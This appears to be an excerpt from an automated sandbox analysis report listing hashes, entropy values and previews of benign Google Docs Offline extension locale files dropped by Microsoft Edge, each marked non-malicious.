                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):878
                                                                                                                                                                                                                                                            Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                            MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                            SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                            SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                            SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2766
                                                                                                                                                                                                                                                            Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                            MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                            SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                            SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                            SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):978
                                                                                                                                                                                                                                                            Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                            MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                            SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                            SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                            SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):907
                                                                                                                                                                                                                                                            Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                            MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                            SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                            SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                            SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):914
                                                                                                                                                                                                                                                            Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                            MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                            SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                            SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                            SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):937
                                                                                                                                                                                                                                                            Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                            MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                            SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                            SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                            SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1337
                                                                                                                                                                                                                                                            Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                            MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                            SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                            SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                            SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2846
                                                                                                                                                                                                                                                            Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                            MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                            SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                            SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                            SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):934
                                                                                                                                                                                                                                                            Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                            MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                            SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                            SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                            SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):963
                                                                                                                                                                                                                                                            Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                            MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                            SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                            SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                            SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1320
                                                                                                                                                                                                                                                            Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                            MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                            SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                            SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                            SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):884
                                                                                                                                                                                                                                                            Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                            MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                            SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                            SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                            SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):980
                                                                                                                                                                                                                                                            Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                            MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                            SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                            SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                            SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1941
                                                                                                                                                                                                                                                            Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                            MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                            SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                            SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                            SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1969
                                                                                                                                                                                                                                                            Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                            MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                            SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
